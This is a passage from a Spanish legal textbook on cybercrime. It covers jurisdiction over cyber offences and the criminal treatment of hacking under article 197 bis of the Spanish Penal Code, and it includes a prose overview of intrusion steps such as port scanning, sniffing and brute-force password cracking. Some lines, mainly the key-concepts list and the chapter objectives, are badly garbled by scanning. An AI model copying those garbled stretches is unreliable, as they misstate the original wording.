Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

prudencia española aplicaba diversos criterios, como el domicilio del querella-


do, el lugar del descubrimiento de pruebas materiales del delito, el lugar donde
se suben los contenidos ilícitos a Internet, el lugar de ubicación del servidor,
el lugar donde se produce la descarga de los contenidos, etc. Ante esta situa-
ción, como hemos apuntado más arriba, el TS adoptó el criterio de la ubicui-
dad, mucho más flexible, pues considera que el "lugar de comisión del hecho" es
cualquiera de los lugares donde se realice algún elemento del tipo penal. Por lo
tanto, es competente el juez de instrucción de cualquiera de las circunscripcio-
nes en las que se haya producido algún elemento del tipo, asumiendo la investi-
gación el primero que haya iniciado las actuaciones procesales. El (ciber)delito
para el TS es un delito de tracto mutante e itinerante, que despliega sus efectos
en una multiplicidad de ubicaciones geográficas, por lo que entiende que seco-
mete en todos y cada uno de los lugares donde se manifiestan sus efectos, e
incluye tanto el lugar de la acción como del resultado, y estos factores deben te-
nerse en cuenta a la hora de flexibilizar el criterio de atribución competencia!.

4.4. El modelo de atribución de competencia jurisdiccional en el Convenio de


Budapest
El déficit de armonización y cooperación en torno a la aplicación de la
ley penal en el ciberespacio hace reaparecer aquí el Convenio de Budapest,
como una piedra angular del sistema, gracias a su decidida apuesta por la ar-
monización (prevé medidas de armonización de carácter sustantivo y proce-
sal) y la cooperación, ante las graves dificultades y el enorme flujo de casos de
litispendencia internacional por conductas en el ciberespacio, nada recomen-
dable en el marco de las relaciones entre Estados.
La litispendencia internacional tiene como objeto impedir el planteamiento de
un mismo litigio ante los tribunales de dos Estados para evitar duplicidades proce-
sales y la vulneración del principio non bis in idem. Las condiciones para aplicar un
supuesto de litispendencia internacional son tres: identidad de objetos entre ambos
procesos, identidad de las partes, y que el procedimiento se encuentre pendiente de
resolución en uno de los Estados por haber iniciado las actuaciones.

Ej. 4.31: La doctrina del TfUE, en el caso Wintersteiger vs. Pl'Oducts


4U, establece una solución a los problemas de jurisdicción internacional
por responsabilidad colectiva en Internet en relación con la vulneración
del derecho de marca que enfrenta a compañías radicadas, en este caso,
en dos Estados europeos, Alemania y Austria. Las líneas de solución prin-
cipales que el TJUE dicta en este caso, con apoyo en su jurisprudencia
previa, son: que los criterios de competencia judicial internacional sean
claros y previsibles en clara alusión a la seguridad jurídica de las partes ; el
fuero principal debe ser el lugar en que se ha producido el hecho dañoso ;

- 186 -
Capitulo 4. EL CIBERCRIMEN. DEFINICIÓN, C

cuando este pueda entenderse produ •ido en varios lugares, prevalece la


teoría de la ubicuidad y conforme a la misma, serán competentes, alterna-
tivamente, los órganos del lugar en que se ha producido la acción - hecho
causal, o bien del lugar donde se ha producido el resultado. Ahora bien, en
materia de ilícitos cibernéticos, ante la dificultad de fijar el lugar donde se
considera realizada la conducta y donde se produce el resultado, debe en-
tenderse que el lugar de producción del hecho es aquel donde se adopta la
decisión inteligente (el centro de decisión del actor), no donde se produce
el proceso técnico, y por lugar de producción del daño debe entenderse
el lugar donde la víctima tenga su centro de intereses, que puede coinci-
dir o no con su nacionalidad y su domicilio. Por último, para establecer la
preferencia entre el factor "acción" o el de "resultado", tiene en cuenta dos
criterios: 1) el lugar donde se disponga de accesos eficaces a las fu entes
de prueba; 2) el lugar que presumiblemente sea más efic.:iente y garantista
para sustanciar el proceso (FLORES PRADA, 2015).

Por lo que se refiere a la aplicación de la ley penal, esto es, a la jurisdic-


ción competente, el Convenio de Budapest supuso un importante avance en
la armonización normativa, aunque limitada a los países que conforman el
Consejo de Europa lo que entraña un obstáculo todavía insalvable en relación
con la extraterritorialidad. Las líneas generales de actuación las encontramos
en el art. 22 y son tres; 1) acudir a los fueros comunes de atribución de com-
petencia judicial nacional, entre ellos el territorio [art. 22.1 a)]; 2) respetar
las normas internas de determinación de la competencia judicial nacional; 3)
si existe controversia, celebrar consultas entre las Partes, es decir, dialogar en
aras de la Parte que resulte más adecuada o conveniente (art. 22.5).
El Convenio de Budapest, en armonía con la tradicional normativa inter-
nacional, consagra el principio de territorialidad pero complementado por el
de personalidad, es decir, el Estado se atribuye competencias para la persecu-
ción de sus nacionales por los delitos cometidos en otro estado distinto, siem-
pre que el hecho esté tipificado como delito en el lugar de su realización - prin-
cipio de doble incriminación, y también en el caso de que ningún Estado posea
competencia territorial sobre el delito (art. 22.1, d), sin excluir otras compe-
tencias que pudieran haber asumido, con carácter previo, los Estados Parte. En
todo caso, los fueros comunes de asignación de la competencia jurisdiccional
establecidos son: la territorialidad, la nacionalidad del autor y, por último, será
competente el Estado del territorio donde se encuentre el presunto autor, a
condición de que no pueda ser extraditado a otra Parte por razón de su nacio-
nalidad cuando haya sido reclamado, es decir, previa solicitud de extradición.
Por otro lado, el documento contiene mecanismos que permiten preser-
var la información digital almacenada en el extranjero y ofrece acceso a dicha

- 187 -
Ci bercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

información a través de Tratados de Asistencia Jurídica Mutua (MLAT, por sus


siglas en inglés).
En el ámbito de la cooperación, de igual modo, existen Redes de cooperación
judicial, tanto en el contexto de la UE como en la Comunidad Iberoamericana de Na-
ciones: "Eurojust" (The Euro pean Union 's Judicial Cooperation Unit) acoge a los paí-
ses miembros de la UE desde 2002, la Red Iberoamericana de Cooperación Jurídica
Internacional a "IberRed" reúne a 22 países y fue creada en 2004.

En definitiva, aunque la postura no es pacífica, el criterio más extendido


y asentado en la doctrina y en la jurisprudencia, en derecho comparado y en
el derecho interno, es aplicar la teoría de la ubicuidad. Con todo, el empleo
del criterio de la ubicuidad ha sido criticado por la doctrina: en primer lugar,
por los conflictos en caso de que concurran supuestos de coautoría de suje-
tos nacionales de Estados distintos; en segundo lugar, en los casos en que la
conducta ostenta una naturaleza diferente en los Estados implicados, inclu-
yendo la problemática en torno a la inexistencia o existencia de tratados que
aborden la extradición; por último, y no menos importante, surge la incógnita
sobre la competencia jurisdiccional que debe ostentar el Estado donde solo
se hayan producido conductas de cooperación (BARRIO ANDRÉS, 2018).
Ej. 4.32 : La conducta ostenta una naturaleza diferente si resulta lícita en un
Estado e ilícita en otro, de ahí que se resalte la importancia de la armonización en-
tre las legislaciones de los Estados. En cuestión de extradición, aparte de compro-
bar la existencia de un tratado al respecto entre los Estados implicados, habrá que
analizar el contenido del mismo, contando con la reserva innata que muestran
los Estados a entregar a sus nacionales para que estos sean juzgados fuera de su
territorio. Y respecto a la figura del cooperador, p. ej., los proveedores de servicios
de Internet o las plataformas intermediarias, la objeción es la extensión de la te-
rritorialidad de la ley penal que supone la teoría de la ubicuidad, porque plantea
conflictos constitucionales de jurisdicción y político criminales.

Como vemos, los modernos ordenamientos jurídicos no han alcanzado


un grado de modernidad que les permita enfrentar los tres elementos, hasta
ahora irresolubles, que caracterizan a la aplicación espacial de la legislación
y jurisdicción respecto de la cibercriminalidad. Primero, ubicar con exacti-
tud el lugar donde se cometen los hechos; segundo, determinar la autoría de
los hechos; y tercero, delimitar la ley penal aplicable cuando acción y resul-
tado no comparten un mismo territorio, y pueden manifestarse en multitud
de Estados. Por estas razones, la doctrina afirma que la solución o las vías
de solución se reconducen a la armonización sustantiva de las leyes penales
en materia de cibercriminalidad y la cooperación internacional para llevar a
cabo una actividad judicial y policial razonablemente homogénea en torno al
fenómeno delictivo virtual (FLORES PRADA, 2015).

- 188 -
Capitulo 4. EL CIBERCRIMEN. DEFINICIÓN, CLASIFI A l NY

CONCEPTOS CLAVE

.. ,. . ~ ~ i,, t; "
Delito informático, sentido estricto, cibercrimen en seritfüo
amplio, hacktivism·o, com mes, computer assitea critries, transnacio-
nalidad, Convenio de Bu ación, cooperaaión;1derec}io. de la Unión
Europea, derecho ínteino, e~r,a. emton idad, teoriaq,e laul:l°cuidad,jurisdit;,ción.
. -_ .
. ' ' J;:·,.« /& .
,
. . ¡;

EJERCICIOS DE AUTOEVALUACIÓN
l. Explique por qué la ciberseguridad debe ser entendida como un bien jurídico
digno de protección penal.
2. ¿Por qué es preferible la denominación cibercrimen a la de delito informático?
3. Defina los ciberdelitos en sentido estricto y ponga un ejemplo.
4. Defina los ciberdelitos en sentido amplio y ponga un ejemplo.
5. Explique una práctica ilícita en el ciberespacio que no constituya sin embargo
cibercrimen y explique por qué.
6. ¿Qué es el hacktivismo? Ponga un ejemplo.
7. ¿Qué división realiza el Convenio de Budapest de los delitos en el ciberespacio?
8. ¿A través de qué dos técnicas legislativas se ha llevado a cabo la regulación sus-
tantiva de los ciberdelitos en derecho comparado?
9. ¿Qué dificultades comporta la determinación del lugar de comisión del hecho
en los ciberdelitos? Ponga un ejemplo.
10. Exponga las tres objeciones formuladas por la doctrina a la aplicación de la teo-
ría de la ubicuidad.

- 189 -
Tercera parte:
Los cibercrítnenes
en particular
Capítulo 5
Ciberdelitos en sentido estricto
OBJETIVOS DEL CAPÍTULO

.,
. • Ñ ~ ''
r ~

· En 4este capítulo vamos a estudiar, tanto de$de un ptinto de vista normati-


,, vo, pero fáinbién fenomenológícó, los· délitos'éÓntrá1a confidenciluidad, la in-
tegi;idad y la ~ispo~ibfü~ad de lt.?s sisterná's in,formáticos,::.tfo.s gi¡i:;iremos pa
élló por las definiciones del Cóqigo 'penal, analizando l9s comportamientos ·
punibles como hq,cking"y sus actos preparatorios {artículós 197 bis CP. y,197
t, ~' ' ,~ ~ .. ' ' ~J.{:, Y;.

ter Cp) y_áquellos constitutivos ~e daños informátitós, y sus actos preparat0:-


ri0s punibles.(malware cast:j'gado 'en l9s artí.culos 26~. 26:.t bis y 264 ter Cp ); asi- \1
como las -J:'.~·-
~¿.:,
circunstancias
, "''-, ~
agravantes
~ f,;,,: ,,
y disposiciQnes
.,,
f . ·:, '.M
comunes.
, 'jr'
Insistiremos
~/1 , ' •\..
~n la ,
"' .
distinc;íón de -conducta~ consideradas punibles y las que n:o lo son, en especial
~n relacíóp. con el hackJn9 ~lapco,o cop-Ia interpre,ta~ión9ue él'epa.,darsr a cíer-.,,.>
<;l
~os el5:!m~ntos de los delitos\ como la referencia a una ·determinada gravedad.
/ :Y<, ;.;• ., ' - , . .
J
.ti{
I. HACKING. ACCESO ILÍCITO

Se conoce por hacking, en sentido amplio, la exploración (con frecuencia


seguida de la publicación y a veces de la utilización) de brechas de seguridad
y en sentido estricto, el acceso ilícito a un sistema informático mediante la
explotación de vulnerabilidades, sin alusión a las finalidades con las que se
realice el acceso, lo que le diferenciaría de la conducta de cracking, en la que
el acceso se perpetra con la intención de dañar. En los inicios de la informáti-
ca el hacking fue un elemento esencial en la propia evolución de las TIC. Ade-
más, el perfil elitista del hacker en una época en la que muy pocos tenían los
conocimientos necesarios para realizar estas conductas y su motivación por
lo general meramente intelectual, dotaba al hacker, en aquellos tiempos, de
un aura de leyenda y de respeto.
Ej. 5.1: Es un clásico referirse a la importancia que los hackers tuvi eron en
la creación de lnternet ( R o sEN ZWETG, 1998), pero no solo, recuérdense también
los ejemplos 1.6 y 1.7.

Sin embargo, la universalización de la informática, con la consiguiente


ampliación de los sujetos con conocimientos para realizar una intrusión, la
sustitución paulatina del hacking por cracking y la multiplicación de los efec-
tos dañinos que el mero intrusismo puede provocar a particulares y a organi-
zaciones han trasmutado por completo la consideración sobre el hacking, de
manera que en la actualidad la mayoría de los Estados lo consideran ilícito e
incluso delictivo si se realiza con vulneración de medidas de seguridad.
En cuanto al modus operandi de los delincuentes, la realización del hac-
king como ya se ha comentado, consiste en la explotación de vulnerabilidades

- 195 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

para conseguir el acceso a un sistema informático. Por ello, antes de la realiza-


ción de la intrusión, el hacker suele llevar a cabo un proceso de investigación
y acopio de información previo que se conoce como pre-hack-stage (MooRE,
2006) o tambiénfootprinting. Las vulnerabilidades, como vimos en el Capítulo
1, pueden provenir de una deficiente programación o de un cambio tecnológico
(como la publicación de un parche o hotfix para que los sistemas sean corregi-
dos, que deja al descubierto la vulnerabilidad de los sistemas no actualizados).
Las vulnerabilidades pueden ser también humanas, provenir de fallos de confi-
dencialidad, o de descuidos del propio titular, que haya dejado puertas abiertas
en el sistema. Por ejemplo, el hacker puede utilizar un escáner de puertos, que
es un programa que analiza el estado de los puertos de una máquina que esté
conectada a Internet (host), mediante el envío de paquetes a puertos específi-
cos y el análisis de las respuestas. Con ello consigue conocer detalles sobre los
servicios en ejecución o identificar posibles vulnerabilidades. Las técnicas usa-
das para conseguir información explotando vulnerabilidades humanas pueden
ser muy diversas, desde el estudio de la información que la propia empresa u
organización publica, el uso de técnicas de "ingeniería social" para obtener, por
lo general con engaños, información de la propia víctima (por ejemplo de los
empleados de la empresa u organización), hasta la búsqueda de información
en la basura de la persona o empresa (dumpster diving o trashing), o incluso el
robo físico, o bien el uso de sniffers para espiar en la red y conseguir informa-
ción, como por ejemplo las contraseñas de acceso a un sistema. En su defecto,
puede utilizar un conjunto de herramientas de software, como por ejemplo los
programas de descifrado de contraseñas (password cracking), que utilizan di-
versos métodos, como el llamado "ataque de fuerza bruta", en el que, a partir
del conocimiento del algoritmo de cifrado empleado y de un par texto claro/
texto cifrado, se va probando cada uno de los miembros del par con cada una de
las posibles combinaciones, hasta obtener el otro miembro del par. Este méto-
do suele combinarse con un "ataque de diccionario", en el que se va probando
con diferentes palabras.
Las contraseñas que solo utilizan dígitos son más fáciles de descifrar que
aquellas que los combinan con letras u otros símbolos, las que contiene menos ca-
racteres son más fáciles que las más largas.

Finalizada esta fase comenzará la de ataque, pero para conseguir el


anonimato, el hacker se habrá dotado previamente de determinadas herra-
mientas con las que ejecutarlo, como proxies, botnets, o rootkits ... Finalmente
procederá a la rotura del sistema, o fase final del ataque: el hacker utiliza un
exploit, es decir, un script o programa, o una tecnología o incluso ciertos datos
sensibles, que le permiten obtener ventaja de la vulnerabilidad para penetrar
en el sistema.

- 196 -
Capítulo 5. CIBERDELITOS EN SENTI

A continuación, estudiaremos la regul ión d st d lito en 1 Código


penal español.

l. Artículo 197 bis Cp

El artículo 197 bis del Código penal español dispone:


l. El que por cualquier medio o procedimiento, vulnerando las medidas de
seguridad establecidas para impedirlo, y sin estar debidamente autorizado, acceda
o facilite a otro el acceso al conjunto o una parte de un sistema de información o se
mantenga en él en contra de la voluntad de quien tenga el legítimo derecho a ex-
cluirlo, será castigado con pena de prisión de seis meses a dos años.
2. El que mediante la utilización de artificios o instrumentos técnicos, y sin
estar debidamente autorizado, intercepte transmisiones no públicas de datos infor-
máticos que se produzcan desde, hacia o dentro de un sistema de información, in-
cluidas las emisiones electromagnéticas de los mismos, será castigado con una pena
de prisión de tres meses a dos años o multa de tres a doce meses.

1.1. Intrusismo informático


El artículo 197 bis fue introducido por la Ley Orgánica 1/2015, de 30 de
marzo, por la que se modifica la Ley Orgánica 10/1995, de 23 de noviembre,
del Código Penal. En su primer párrafo se castiga, siguiendo los compromi-
sos adquiridos con la ratificación del Convenio de Budapest sobre ciberde-
lincuencia de 2001, y, en especial, en cumplimiento de las obligaciones más
estrictas impuestas por la Directiva 2013/40/UE de 12 de agosto, relativa a
los ataques contra los sistemas de información, el llamado hacking o intrusis-
mo informático o acceso ilegal a un sistema informático.
Con anterioridad a la reforma del 2010 las conductas de acceso a un sistema
informático solo eran constitutivas de delito si con ellas el sujeto se apoderaba de
datos personales y se realizaban con la intención de descubrir secretos. A partir de
la L.O. 5/2010, de 22 de junio, de reforma del Código Penal («B.O.E.» 23 junio) se
introdujo un nuevo tipo penal que castigaba el acceso sin autorización por cualquier
medio o procedimiento y vulnerando las medidas de seguridad establecidas para
impedirlo, a datos o programas informáticos contenidos en un sistema informático
o en parte del mismo. En 2015 se elimina la exigencia de que se acceda efectiva-
mente a datos o programas, bastando con que se acceda al sistema o a una parte del
mismo.

El legislador español ha decidido introducir el precepto entre los delitos


contra la intimidad, el derecho a la propia imagen y la inviolabilidad del do-
micilio, ubicación errónea para quienes defendemos que lo protegido es un
bien jurídico colectivo antepuesto: la confidencialidad, la integridad y la dis-

- 197 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

ponibilidad de los sistemas informáticos, o si se prefiere, y de forma abrevia-


da, pero teniendo en cuenta que con ello se hace referencia a las condiciones
en las que se respetan los atributos anteriores, la seguridad informática (Gu-
TIÉRREZ FRANCÉS, 1994, ROMEO CASABONA, 2013, 2016, TOMÁS-VALIENTE LANUZA, 2015,
RUEDA MARTIN, 2018). Por ello algunos autores han propuesto crear un título
nuevo en el Código penal que llevara por rúbrica "Delitos contra los sistemas
de información".
Esta disparidad entre el bien jurídico protegido y la rúbrica bajo la que
se enmarca el delito ha provocado que una parte de la doctrina niegue el pri-
mero y, en consecuencia, critique el castigo de las conductas de intrusismo
informático como una anticipación excesiva de la intervención penal (ABoso,
2017, ANARTE BoRRALLO/ DovAL PAfs, 2016, MoRóN LERMA, 1999). Así, si se fija la
atención en exclusiva en la lesividad que estas conductas pudieran tener para
la intimidad de las personas, el ataque al sistema informático constituiría tan
solo, todavía, un acto preparatorio. En esta obra, por las razones ampliamente
expuestas en los capítulos anteriores, creemos que esta crítica no es correc-
ta. La misma parte de una errónea identificación del bien jurídico, favorecida
por la incorrecta ubicación sistemática. A ello se suelen añadir otros errores,
como una excesiva confianza en las capacidades meramente tecnológicas de
protección del bien jurídico y sobre todo una minusvaloración de la impor-
tancia de la seguridad informática. Al respecto no hay que olvidar la impor-
tancia que, como destacábamos en los capítulos anteriores, ha adquirido la
informática en todos los aspectos de nuestras vidas, desde nuestro propio
hogar, las empresas, las infraestructuras estatales básicas, la administración
pública, el sistema sanitario, el sistema financiero ... y con ello la cantidad de
bienes jurídicos que pueden resultar finalmente involucrados. Además de
adelantar la protección de otros bienes jurídicos, la seguridad informática,
como bien jurídico colectivo, tiene una dimensión positiva, en tanto crea las
condiciones necesarias y vinculantes para un correcto funcionamiento del
sistema social en el marco de las TIC (RUEDAMARTIN, 2018).
Una tercera opción interpreta, haciendo una similitud entre el hacking y el
allanamiento de morada, y otorgando plena legitimidad a la intervención penal, que
lo protegido al sancionar el intrusismo informático es el pacífico disfrute del pro-
pietario del sistema o de la información frente a intromisiones no autorizadas (LE-
ZERTúA, 2002), mientras que otros hablan de "libertad informática" o de "intimidad
informática". Consideramos, sin embargo, que esta opinión era más propia de una
época (antes de la reforma de 2015) en que la legislación española exigía para cas-
tigar el hacking el acceso efectivo a los datos o programas contenidos en un sistema
informático. Hoy en día se castiga en el 197 bis el mero acceso no autorizado al sis-
tema, por lo que parece preferible el bien jurídico aquí propuesto, pues la seguridad
informática contiene aspectos colectivos que van más allá del interés en el pacífico

- 198 -
Capítulo 5. CIBERDELITOS EN SENTID

disfrute del propietario del sistema informático d 1 In~ m Ión on nld n


él. El concepto "libertad informática" debes r utlllz do p r tonto para referirnos al
bien jurídico protegido en el actual art. 197.2, p ro no para el 197 bis (RUEDA MARTIN
2018).

Los tribunales también se encuentran divididos en relación con el tema


del bien jurídico protegido, que resulta de especial relevancia para la poste-
rior interpretación teleológica del tipo penal.
Así, encontramos sentencias que defienden la existencia de un bien ju-
rídico colectivo, como la Sentencia del Juzgado de lo Penal n 2 2 de Barcelona, de
28.05.1999, FJ 1º (caso Hispahack), y otras en cambio que lo rechazan, como la de
la Sección nº 07 de la Audiencia Provincial de Madrid de 27.11.2017, FJ 2º: "Frente
a la tesis que sostiene que el bien jurídico protegido en este delito es la seguridad
de los sistemas informáticos, cabe defender que la incriminación de esta conducta
supone un adelantamiento de las barreras de protección de la intimidad que parte
de la consideración de que la mera intromisión informática pone en peligro la pri-
vacidad del titular del sistema". Otras sentencias hablan de la protección del bien
jurídico ""libertad informática" recogida en el art.18.4 CE ... que permite a su titu-
lar decidir sobre el control de dichos datos personales" (SAP de Madrid, Sección 2ª.
de14.09.2018), y que constituye una dimensión positiva de la intimidad (Auto de la
AP de Logroño de 19.05.2017).

Pero los problemas de la incorrecta ubicación sistemática no acaban


aquí. La doctrina se pregunta también si al estar este delito dentro de los de-
dicados a proteger la intimidad personal y familiar, una interpretación siste-
mática obliga a considerar atípicas, no delictivas, las intromisiones en siste-
mas informáticos que no contengan datos de esta clase (Ru EDA MARTIN 2018) . La
postura de la Fiscalía, sin embargo, parece ser la contraria, pues en su Circu-
lar 3/2017 afirma que el acceso ilegal a un sistema informático castigado en
el art. 197 bis puede cometerse también para acceder a secretos de empresa
o a secretos oficiales. Es decir, no lo reduce al ataque a sistemas que conten-
gan datos personales y familiares. En esta obra vamos a defender que esta es
la solución correcta, pues es coherente, además, con la exposición de motivos
de la reforma de 2015, que remite a los compromisos internacionales, y se
refriere expresamente a la intención de incluir supuestos que no afectan a la
intimidad personal:
Así, la exposición de motivos explica que "la reforma lleva a cabo la transposi-
ción de la Directiva 2013/40/UE, de 12 de agosto, relativa a los ataques contra los
sistemas de información y la interceptación de datos electrónicos cuando no se tra-
ta de una comunicación personal". Las modificaciones realizadas pretenden, según
el propio legislador, superar las limitaciones de la regulación anterior "para ofrecer
respuesta a la delincuencia informática en el sentido de la normativa europea". Y así,
añade la exposición de motivos; "se introduce una separación nítida entre los su-
puestos de revelación de datos que afectan directamente a la intimidad personal, y

- 199 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

el acceso a otros datos o informaciones que pueden afectar a la privacidad pero que
no están referidos directamente a la intimidad personal: no es lo mismo el acceso al
listado personal de contactos, que recabar datos relativos a la versión de software
empleado o a la situación de los puertos de entrada a un sistema. Por ello, se opta
por una tipificación separada y diferenciada del mero acceso a los sistemas infor-
máticos. Con el mismo planteamiento, y de acuerdo con las exigencias de la Direc-
tiva, se incluye la tipificación de la interceptación de transmisiones entre sistemas,
cuando no se trata de transmisiones personales: la interceptación de comunicacio-
nes personales ya estaba tipificada en el Código Penal; ahora se trata de tipificar las
transmisiones automáticas -no personales- entre equipos".

En efecto, la Directiva 2013/40/UE de 12 de agosto, en sus consideran-


dos expone que se pretende la defensa de los sistemas de información no solo
en atención a una posible anticipación de la protección de la intimidad de las
personas, sino también a su importancia para la interacción política, social
y económica en la Unión, haciendo referencia expresa a las infraestructuras
vitales de los Estados miembros y al peligro que los ataques informáticos su-
ponen para la realización de una sociedad de la información segura y de un
espacio de libertad, seguridad y justicia. En conclusión, entendemos que no
procede una interpretación restrictiva del art 197 bis, que además de ir con-
tra la propia voluntad del legislador expresada en la exposición de motivos de
la reforma de 2015, supondría un incumplimiento de los compromisos inter-
nacionales.
Como se comentó en el capítulo anterior, el Convenio de Budapest obliga
a los Estados a sancionar penalmente el hacking, pero luego ofrece una serie
de opciones, como exigir que la conducta se cometa infringiendo medidas de
seguridad o con determinadas finalidades delictivas, mientras que la Direc-
tiva 2013/40/UE, de 12 de agosto, conmina a los Estados a castigar el acce-
so sin autorización al conjunto o a una parte de un sistema de información
cuando se haya cometido intencionalmente y con violación de una medida de
seguridad. Haciendo uso de las posibilidades que el conjunto de ambas dis-
posiciones ofrece, el legislador español castiga con pena de prisión el acceso
no consentido y la facilitación del mismo, cuando se realizan vulnerando las
medidas de seguridad establecidas para impedirlo, sin exigir ninguna finali-
dad ulterior. Ambas características refuerzan la idea aquí mantenida de que
lo protegido es la seguridad informática, como el conjunto de condiciones
bajo las que se respetan la confidencialidad, la integridad y la disponibilidad
de los sistemas informáticos.
En consecuencia, el legislador español ha venido a castigar lo que la
doctrina y la jurisprudencia denominan el hacking puro (intromisión sin
más, sin referencia a finalidades específicas). Ello ha generado un deba-

- 200 -
te sobre la conveniencia o no de castigar el ll m oh king blanco. En el
ámbito de la informática se utiliza el término hacktng blanco para referirse
a un acceso dirigido a finalidades licitas, por lo que se le conoce también
como hacking ético. Aunque la terminología ha variado mucho a lo largo
del tiempo, hoy en día podemos decir que se entiende mayoritariamente
por hacker de sombrero blanco un profesional experto en seguridad infor-
mática generalmente contratado por la empresa propietaria del sistema de
información para probar y mejorar la seguridad de su sistema. Al actuar
con el consentimiento del propietario del sistema no realizaría el tipo del
art. 197 bis, ya que este exige la actuación contra su voluntad. Quien, en
cambio, se introdujera en un sistema ajeno sin la autorización de titular con
la intención de descubrir sus vulnerabilidades pero con el único fin de co-
municárselas al titular, es decir, sin los fines maliciosos que caracterizan al
hacker de sombrero negro o cracker, quizás por mero reto personal o con
las esperanza de recibir una recompensa, obtener un empleo o el mero re-
conocimiento (lo que sigue constituyendo en el lenguaje informático hac-
king blanco), sí realizaría el tipo penal.
Algunos sectores han criticado el castigo penal de estas conductas, ar-
gumentando su necesidad para el avance de la seguridad informática, su ino-
cuidad, su finalidad ética, u otros motivos, pero si se piensa bien su ilicitud es
irrebatible.
Ej . 5.2: Imaginemos un sujeto que, mientras dormimos , armado con una
ganzúa, una llave bumping o incluso un martillo y otras herramientas para le-
vantar las bisagras, consigue desmontar nuestra puerta blindada y meterse en
nuestra casa hasta la cocina, tras lo cual nos aclara que no lo hace con ninguna
intención dañina, sino por mero reto intelectual (es un fanático del funciona-
miento de las puertas blindadas) y con la intención de hat:ernos ver lo vulnera-
ble que es la nuestra. Obviamente nuestra respuesta será que nadie le ha dado
permiso para entrar en nuestra casa ni le ha pedido que examine su seguridad.
El sujeto, sean cuales fueran sus intenciones, ha cometido un allanamiento de
morada. Lo mismo ocurre con el acceso no autorizado a un sistema informático
vulnerando medidas de seguridad . Lesiona la confidencialidad, la integridad y
la disponibilidad de los sistemas informáticos, con independencia d e los fines
ulteriores del hacker.

Por supuesto con el mismo argumento cometerá el delito quien realice


la conducta anterior con el objetivo de vender la información obtenida sobre
las vulnerabilidades del sistema o la solución a dichas vulnerabilidades a la
propia empresa titular del sistema (hacker de sombrero gris u oportunista
-MOORE, 2006-).

- 201 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

¿ Queda entonces algún espacio de actividad lícita para el hacking blanco


o gris? Estimamos que sí. Además de aquellos en los que el hacker trabaja
con el consentimiento del titular del sistema pues su finalidad es contribuir
a mejorar su seguridad (hacking ético), quedan incluso espacios de negocio
para el hacking independiente. Si el hacker, sin haber penetrado ilícitamen-
te en un sistema de información ajeno vulnerando medidas de seguridad, ha
descubierto una vulnerabilidad en un sistema informático y después trasmite
esta vulnerabilidad, y la forma de explotarla vulnerando medidas de seguri-
dad del fabricante, precisamente al titular o usuario legítimo de ese sistema
con el ánimo de que esté preparado para evitar ese posible ataque, entonces
la conducta del hacker no es subsurnible en ninguno de los tipos penales que
estamos estudiando. Lógicamente la línea entre lo legal y lo ilegal es muy fina.
El hacker tendrá que asegurarse, en primer lugar, de que en su investigación
no ha penetrado en un sistema de información ajeno ilegalmente y en segun-
do lugar que su cliente, a quien entrega toda esta información, no la usará
precisamente para acceder ilegalmente a sistemas ajenos.
Ej. 5.3: Existen empresas de seguridad dedicadas precisamente a esto. Así
por ejemplo, Zerodium es una compañía estadounidense de adquisición de vul ne-
rabilidades de día cero y avanzadas. Esta empresa paga sustanciales recompensas
a los investigadores de seguridad para adquirir vulnerabilidades y exploits, sobre
los que no se haya informado todavía a las autoridades o empresas afectadas.
Puede llegar a pagar hasta 2.000.000 de dólares según datos de su propia página
web (https://zerodium.com/). Zerodium explica en su web que sus cl:ientes se li-
mitan a una lista muy restringida, principalmente gobiernos y empresas y que su
finalidad es proveerles de medidas y recomendaciones de seguridad. Para que la
actividad sea legal no basta con los fines éticos, sino que los investigadores que
descubren las vulnerabilidades y disefian los explotis para Zerodium no deben ha-
ber accedido de forma ilícita a un sistema de seguridad ajeno para ello.

En relación con el objeto sobre el que debe recaer la conducta delic-


tiva, la Directiva 2013/40/UE, de 12 de agosto, en su art. 2, define sistema
de información como "todo aparato o grupo de aparatos interconectados o
relacionados entre sí, uno o varios de los cuales realizan, mediante un pro-
grama, el tratamiento automático de datos informáticos, así como los datos
informáticos almacenados, tratados, recuperados o transmitidos por dicho
aparato o grupo de aparatos para su funcionamiento, utilización, protección
y mantenimiento". Al respecto, la Circular 3/2017 de la Fiscalía recuerda que
la evolución tecnológica ha provocado que existan en nuestros domicilios au-
ténticas redes informáticas domésticas cuyo punto de acceso y comunicación
al exterior se lleva a efecto a través de los routers de las operadoras de co-
municación. En consecuencia, en opinión de la Fiscalía, el acceso a un router

- 202 -
Capítulo 5. CIBERDELITOS EN SENTIDO ESTRICTO

vulnerando su contraseña de seguridad, en tanto forma parte de un sistema


de información, podría integrar este delíto. En nuestra opinión tiene razón la
Fiscalía en este punto. El router forma parte del sistema de información y es
un elemento especialmente vulnerable dentro de la red al robo de la infor-
mación que pasa por él, pues aunque sea temporalmente, almacena la infor-
mación en su memoria interna, de manera que puede ser copiada y enviada a
otro sistema por el hacker.
Ej. 5.4: Un ejemplo de ataque a un router es el conocido como VPNFilter.
Se trata de un malware diseñado para infectar diferentes clases de routers. Se
estima que ha afectado a cientos de miles de routers doméstirns y de pequeñas
empresas en todo el mundo convirtiéndolos en una red de bots que pueden ser
controlados de fo r ma remota por los ciberdelincuentes. Este malwar·e puede ro-
bar datos personales, contraseñas y nombres de usuario, y, además, implemen-
ta un "kill switch", un sistema diseñado para destruir remotamente el router. El
éxito de este ataque pone de manifiesto la escasa conciencia que existe entre
los usuarios sobre la necesidad de proteger el router. La mayoría de los routers
domésticos se encuentran conectados di rectamente a la red con la única protec-
ción ele un nombre de usuario y contraseña que vienen determinados ele fábrica
y son fácilmente encontrados por los cibercriminales. Así actúa precisamente
este ma lware. Se instala aprovechando las credenciales por defecto de los rou-
ters. Por ello es tan importante que el usuario tome medidas de seguridad tan
básicas como cambiar las claves de acceso que vienen configuradas de fábrica .

Las conductas delictivas que integran este tipo penal son tres, dos acti-
vas y una omisiva, y configuran un tipo mixto alternativo. La mera realización
de cualquiera de ellas supone una lesión del bien jurídico confidencialidad,
integridad y disponibilidad de los sistemas informáticos.
